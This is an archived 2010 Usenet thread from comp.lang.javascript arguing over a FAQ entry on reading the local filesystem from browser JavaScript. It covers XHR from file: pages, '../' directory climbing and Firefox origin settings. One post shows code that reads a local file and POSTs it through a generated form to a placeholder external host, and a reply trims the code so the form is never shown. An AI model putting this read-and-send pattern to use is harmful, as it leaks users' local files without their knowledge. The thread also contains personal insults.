FAQ Topic - How can I access the client-side filesystem? (2010-03-11)
FAQ server
FAQ Topic - How can I access the client-side filesystem?
-----------------------------------------------------------------------
Security means that by default you can't. In a more restricted
environment, there are options. For example, using LiveConnect
to connect to Java with Netscape, and using the FileSystemObject
in IE. Check
http://groups.google.com/group/comp.lang.javascript/topics
for previous posts on the subject.
http://msdn.microsoft.com/en-us/library/z9ty6h50%28VS.85%29.aspx
http://www.javaworld.com/javaworld/jw-10-1998/jw-10-apptowin32.html
The complete comp.lang.javascript FAQ is at
http://jibbering.com/faq/
--
The sendings of these daily posts are proficiently hosted
by http://www.pair.com.
Jorge
> -----------------------------------------------------------------------
> FAQ Topic - How can I access the client-side filesystem?
> -----------------------------------------------------------------------
>
> Security means that by default you can't. In a more restricted
> environment, there are options. For example, using LiveConnect
> to connect to Java with Netscape, and using the FileSystemObject
> in IE. Check
>
> http://groups.google.com/group/comp.lang.javascript/topics
>
> for previous posts on the subject.
>
> http://msdn.microsoft.com/en-us/library/z9ty6h50%28VS.85%29.aspx
>
> http://www.javaworld.com/javaworld/jw-10-1998/jw-10-apptowin32.html
>
> The complete comp.lang.javascript FAQ is athttp://jibbering.com/faq/
>
**** In a browser:
1.- You can read any local file with an XHR *but*only*if* the
location.protocol of the page is "file:", e.g.:
a= new XMLHttpRequest();
a.open("GET", location.href, false);
a.send();
would read the page's source file from the local filesystem into
a.responseText:
a.responseText;
--> the page source as text.
2.- (March, 2010) The HTML5 file API draft specs at <http://www.w3.org/
TR/FileAPI/> aims at providing a more convenient and secure enough API
to do it from within any page regardless of the origin... but that
will be in the near future (hopefully).
**** Server Side JS:
Currently, (March, 2010) there are a bunch of new server side
JavaScript projects that allow for that. E.g. Ryan Dahl's Node.js:
http://nodejs.org/api.html
http://blip.tv/play/AYGylE4A
You can read about some more SSJS projects alike and the proposed APIs
at:
http://commonjs.org/
**** THE FAQ IS CRYING OUT LOUD FOR UPDATES & MAINTENANCE
**** THE FAQ IS STATIC
**** THE FAQ DOES NOT REFLECT THE CURRENT JS PANORAMA,
**** NOT EVEN REMOTELY.
--
Jorge.
David Mark
> On Mar 11, 1:00 am, "FAQ server" <javascr...@dotinternet.be> wrote:
>> -----------------------------------------------------------------------
>> FAQ Topic - How can I access the client-side filesystem?
>> -----------------------------------------------------------------------
>>
>> Security means that by default you can't. In a more restricted
>> environment, there are options. For example, using LiveConnect
>> to connect to Java with Netscape, and using the FileSystemObject
>> in IE. Check
>>
>> http://groups.google.com/group/comp.lang.javascript/topics
>>
>> for previous posts on the subject.
>>
>> http://msdn.microsoft.com/en-us/library/z9ty6h50%28VS.85%29.aspx
>>
>> http://www.javaworld.com/javaworld/jw-10-1998/jw-10-apptowin32.html
>>
>> The complete comp.lang.javascript FAQ is athttp://jibbering.com/faq/
>>
>
> **** In a browser:
>
> 1.- You can read any local file with an XHR *but*only*if* the
> location.protocol of the page is "file:", e.g.:
>
> a= new XMLHttpRequest();
> a.open("GET", location.href, false);
> a.send();
>
> would read the page's source file from the local filesystem into
> a.responseText:
>
> a.responseText;
> --> the page source as text.
>
But by default, some browsers (e.g. FF) do not allow this. You have to
adjust the security settings (assuming you can) to permit such operations.
Jorge
I have tested it in Safari, Chrome, FF2, 3, 3.5 and 3.6, Opera 9.64,
10 and 10.5, Netscape Navigator 7.2 and 9, on a Mac, and it works in
all of them:
javascript: var a= new XMLHttpRequest(); a.open("GET", location.href,
false); a.send(null); alert(a.responseText);
--
Jorge.
Evertjan.
> I have tested it in Safari, Chrome, FF2, 3, 3.5 and 3.6, Opera 9.64,
> 10 and 10.5, Netscape Navigator 7.2 and 9, on a Mac, and it works in
> all of them:
>
> javascript: var a= new XMLHttpRequest(); a.open("GET", location.href,
> false); a.send(null); alert(a.responseText);
Wow!
I even can read other files [Chrome tested]:
test.html
<script type='text/javascript'>
var f = location.href.replace('test','temp');
alert(f);
var a= new XMLHttpRequest(); a.open("GET", f, false);
a.send(null);
alert(a.responseText);
</script>
or just relative adressed:
<script type='text/javascript'>
var f = 'temp.html';
var a= new XMLHttpRequest(); a.open("GET", f, false);
a.send(null);
alert(a.responseText);
</script>
Reading a csv-file as a read-only database would be nice.
<script type='text/javascript'>
var f = 'test.csv';
var a= new XMLHttpRequest(); a.open("GET", f, false);
a.send(null);
alert(a.responseText);
</script>
Yes!
--
Evertjan.
The Netherlands.
(Please change the x'es to dots in my emailaddress)
Jorge
"../" works too (to move up one level into the parent folder), and
"../../", etc. up to the root "/". But, if you want to go to the root
it's probably easier to put just "file:///".
--
Jorge.
Thomas 'PointedEars' Lahn
> Jorge wrote:
>> 1.- You can read any local file with an XHR *but*only*if* the
>> location.protocol of the page is "file:", e.g.:
>> [...]
> But by default, some browsers (e.g. FF) do not allow this. You have to
> adjust the security settings (assuming you can) to permit such
> operations.
Both statements are wrong as they are. What matters is that the SOP is met.
PointedEars
--
var bugRiddenCrashPronePieceOfJunk = (
navigator.userAgent.indexOf('MSIE 5') != -1
&& navigator.userAgent.indexOf('Mac') != -1
) // Plone, register_function.js:16
David Mark
> David Mark wrote:
>
>> Jorge wrote:
>>> 1.- You can read any local file with an XHR *but*only*if* the
>>> location.protocol of the page is "file:", e.g.:
>>> [...]
>> But by default, some browsers (e.g. FF) do not allow this. You have to
>> adjust the security settings (assuming you can) to permit such
>> operations.
>
> Both statements are wrong as they are. What matters is that the SOP is met.
>
I think you are splitting hairs. But JFTR, in FF, the setting is:-
security.fileuri.strict_origin_policy
...and by default (setting is true) it will let you load files that are
in the same folder (or sub-directory. If you want to load any local
file, then you have to change the setting to false.
IE is a different story. As mentioned, you have to configure it
(assuming you are allowed to do that) to allow XHR on local files. I
didn't mean to imply that IE disallowed this by default.
And how is any of this news?
Martin Honnen
> "../" works too (to move up one level into the parent folder), and
> "../../", etc. up to the root "/". But, if you want to go to the root
> it's probably easier to put just "file:///".
Does that work for you with Firefox to move up to the parent? I think
they have closed that hole long ago and only allow access to the
directory and subdirectories the document with the script has been
loaded from.
For instance FF 3.0 here throws an exception on doing
var req = new XMLHttpRequest();
req.open('GET', '../file.xml', true);
req.onreadystatechange = function()
{
if (req.readyState === 4)
{
alert(req.responseText);
}
};
req.send(null);
saying the following in the error console:
Security Error: Content at file:///C:/foo/bar/javascript/doc.html may
not load data from file:///C:/foo/bar/file.xml.
Error: uncaught exception: [Exception... "Access to restricted URI
denied" code: "1012" nsresult: "0x805303f4 (NS_ERROR_DOM_BAD_URI)"
location: "file:///C:/foo/bar/javascript/doc.html Line: 15"]
I don't think this has changed in 3.5/3.6.
--
Martin Honnen
http://msmvps.com/blogs/martin_honnen/
Jorge
> Jorge wrote:
> > "../" works too (to move up one level into the parent folder), and
> > "../../", etc. up to the root "/". But, if you want to go to the root
> > it's probably easier to put just "file:///".
>
> Does that work for you with Firefox to move up to the parent? I think
> they have closed that hole long ago and only allow access to the
> directory and subdirectories the document with the script has been
> loaded from.
It works for me in the Operas, Safaris, Chrome, NS Navigators, iCab
and FF2, but not in any FFs >= 3.
--
Jorge.
Thomas 'PointedEars' Lahn
> Thomas 'PointedEars' Lahn wrote:
>> David Mark wrote:
>>> Jorge wrote:
>>>> 1.- You can read any local file with an XHR *but*only*if* the
>>>> location.protocol of the page is "file:", e.g.:
>>>> [...]
>>> But by default, some browsers (e.g. FF) do not allow this. You have to
>>> adjust the security settings (assuming you can) to permit such
>>> operations.
>>
>> Both statements are wrong as they are. What matters is that the SOP is
>> met.
>
> I think you are splitting hairs.
It is wrong to say that "by default, some browsers (e.g. FF) do not allow
this". And you do _not_ have to adjust security settings if both the
source markup resource and the target file resource are accessed using the
`file:' scheme.
> But JFTR, in FF, the setting is:-
>
> security.fileuri.strict_origin_policy
>
> ...and by default (setting is true) it will let you load files that are
> in the same folder (or sub-directory. If you want to load any local
> file, then you have to change the setting to false.
A change appears to have taken place between Firefox 3.5 and Firefox 3.5.8.
Somewhere before Firefox 3.5.8, it was possible to access any local file
from markup accessed with `file:' unless filesystem restrictions applied.
One could retrieve directory listings, and one did not need to provide the
full path.
> IE is a different story. As mentioned, you have to configure it
> (assuming you are allowed to do that) to allow XHR on local files.
No, you do not always have to. However, with IE, or rather MSHTML, you
have to use the ActiveXObject() constructor in order to use `file:' URIs.
But maybe in the meanwhile, through a security update, a change has taken
place there, too. (IIRC I tested with the first release of IE 8.)
> I didn't mean to imply that IE disallowed this by default.
And I did not understood that.
PointedEars
--
Use any version of Microsoft Frontpage to create your site.
(This won't prevent people from viewing your source, but no one
will want to steal it.)
-- from <http://www.vortex-webdesign.com/help/hidesource.htm> (404-comp.)
Dr J R Stockton
>, Thu, 11 Mar 2010 00:00:03, FAQ server <javas...@dotinternet.be>
posted:
>-----------------------------------------------------------------------
>FAQ Topic - How can I access the client-side filesystem?
An inadequate Subject line : the meaning of "I" is ill-defined.
A FAQ Topic needs to represent not what might have been asked but what
ought to have been asked. That should be more like
"How can the server surreptitiously obtain data from the reader's file
system?
>Security means that by default you can't. // [*]
The client side is where the browser runs, usually in front of the
reader's face. There is generally a server side, but it does not need
to have been active recently when code in a page executes. And there is
no need for the server to be active, or even exist, after the page is
delivered to the browser.
I have written code - for example in
<URL:http://www.merlyn.demon.co.uk/js-grphx.htm> - which can read your
file system : AFAICS, the file system of any of you.
It needs your active co-operation, and it cannot send out what it has
read. But it can read your ,htm, .html, .txt files at least.
FAQ entries must not suggest impossibility for what is definitely
possible - that is a grave disservice to any reader who might use the
feature.
[*] AIUI, any text that the reader has access to can be pasted into a
textarea and sent to the server,
--
(c) John Stockton, nr London, UK. ?@merlyn.demon.co.uk Turnpike v6.05 MIME.
Web <URL:http://www.merlyn.demon.co.uk/> - FAQqish topics, acronyms & links;
Astro stuff via astron-1.htm, gravity0.htm ; quotings.htm, pascal.htm, etc.
No Encoding. Quotes before replies. Snip well. Write clearly. Don't Mail News.
Jorge
wrote:
> (...)
> It needs your active co-operation, and it cannot send out what it has
> read. But it can read your ,htm, .html, .txt files at least.
"cannot send out what it has read" ???
How come ?
It CAN be POSTed with a form afterwards:
a= new XMLHttpRequest();
a.open("GET", location.href, false);
a.send();
c= document.createElement('textarea');
c.value= a.responseText;
c.name= "theData";
b= document.createElement('form');
b.action= "http://someWhereElse.net/thereItGoes";
b.method= "post";
b.appendChild(c);
document.body.appendChild(b).submit();
> FAQ entries must not suggest impossibility for what is definitely
> possible - that is a grave disservice to any reader who might use the
> feature.
Couldn't agree any more.
> [*] AIUI, any text that the reader has access to can be pasted into a
> textarea and sent to the server.
And it should be said in this faq entry.
--
Jorge.
David Mark
> On Mar 12, 8:31 pm, Dr J R Stockton <reply1...@merlyn.demon.co.uk>
> wrote:
>> (...)
>> It needs your active co-operation, and it cannot send out what it has
>> read. But it can read your ,htm, .html, .txt files at least.
>
> "cannot send out what it has read" ???
> How come ?
Because *it* clearly refers to the script that was cited...
> It CAN be POSTed with a form afterwards:
>
> a= new XMLHttpRequest();
> a.open("GET", location.href, false);
> a.send();
>
> c= document.createElement('textarea');
> c.value= a.responseText;
> c.name= "theData";
> b= document.createElement('form');
> b.action= "http://someWhereElse.net/thereItGoes";
> b.method= "post";
> b.appendChild(c);
> document.body.appendChild(b).submit();
...and that ain't it. ;)
Evertjan.
> c= document.createElement('textarea');
> c.value= a.responseText;
> c.name= "theData";
> b= document.createElement('form');
> b.action= "http://someWhereElse.net/thereItGoes";
> b.method= "post";
> b.appendChild(c);
> document.body.appendChild(b).submit();
No need to show the textarea, meseems.
Instead of:
b.appendChild(c);
document.body.appendChild(b).submit();
try this:
b.appendChild(c);
b.submit();
works fine here on Chrome.
Jorge
> Jorge wrote on 13 mrt 2010 in comp.lang.javascript:
>
> > c= document.createElement('textarea');
> > c.value= a.responseText;
> > c.name= "theData";
> > b= document.createElement('form');
> > b.action= "http://someWhereElse.net/thereItGoes";
> > b.method= "post";
> > b.appendChild(c);
> > document.body.appendChild(b).submit();
>
> No need to show the textarea, meseems.
>
> Instead of:
>
> b.appendChild(c);
> document.body.appendChild(b).submit();
>
> try this:
>
> b.appendChild(c);
> b.submit();
>
> works fine here on Chrome.
Maybe :-)
But I thought that it wasn't "right" to attempt to send a form that's
not even inserted into the document... ¿?
--
Jorge.
Garrett Smith
> Jorge wrote:
Oh, Jorge. OK. I though someone might've had some substantial gripe
about the FAQ, but now I see its Jorge.
>> On Mar 11, 1:00 am, "FAQ server" <javascr...@dotinternet.be> wrote:
>>> -----------------------------------------------------------------------
>>> FAQ Topic - How can I access the client-side filesystem?
>>> -----------------------------------------------------------------------
>>>
>>> Security means that by default you can't. In a more restricted
>>> environment, there are options. For example, using LiveConnect
>>> to connect to Java with Netscape, and using the FileSystemObject
>>> in IE. Check
>>>
>>> http://groups.google.com/group/comp.lang.javascript/topics
>>>
>>> for previous posts on the subject.
>>>
>>> http://msdn.microsoft.com/en-us/library/z9ty6h50%28VS.85%29.aspx
>>>
>>> http://www.javaworld.com/javaworld/jw-10-1998/jw-10-apptowin32.html
>>>
>>> The complete comp.lang.javascript FAQ is athttp://jibbering.com/faq/
>>>
Sounds right.
>> **** In a browser:
>>
Just because something happens when you type series of characters into
your text editor does not mean that series of characters is FAQ-Entry
material.
>> 1.- You can read any local file with an XHR *but*only*if* the
>> location.protocol of the page is "file:", e.g.:
>>
Just like something Jorge would write.
>> a= new XMLHttpRequest();
>> a.open("GET", location.href, false);
>> a.send();
>>
>> would read the page's source file from the local filesystem into
>> a.responseText:
>>
Maybe in a few browsers. Don't expect nonstandard features out of XHR.
>> a.responseText;
>> --> the page source as text.
>>
>
> But by default, some browsers (e.g. FF) do not allow this. You have to
> adjust the security settings (assuming you can) to permit such operations.
It is XMLHttpRequest. Think about that name. The "HTTP" part of the name
indicates the protocol under which this can be used.
It is a good idea also to read the relevant working draft for XHR. That
draft specifies that XHR is supported for http: and https: protocols,
and that other protocols are not defined by the specification. That spec
can be easily found by searching for XMLHttpRequest.
So next time, Jorge, when you get that feeling in your gut that you had
when you posted this (another) exhibition of stupidity, please go search
the web and do your research first *before* wasting everyone's time. If
you can't understand why things are the way they are, then ask, without
being a drama queen with your all caps bolded PITIFUL, and you might get
a more welcoming response.
--
Garrett
comp.lang.javascript FAQ: http://jibbering.com/faq/
Jorge
> (...)
> So next time, Jorge, when you get that feeling in your gut that you had
> when you posted this (another) exhibition of stupidity, please go search
> the web and do your research first *before* wasting everyone's time. If
> you can't understand why things are the way they are, then ask, without
> being a drama queen with your all caps bolded PITIFUL, and you might get
> a more welcoming response.
What happens is that what this FAQ states is just too little and
plainly wrong. We all understand that you're gonna need your time to
get it and then even some more to eventually act and fix it.
But -Garrett- relax, for wrt faq maintenance, we're already well aware
of your retardation, ok ?
Have a nice day.
--
Jorge.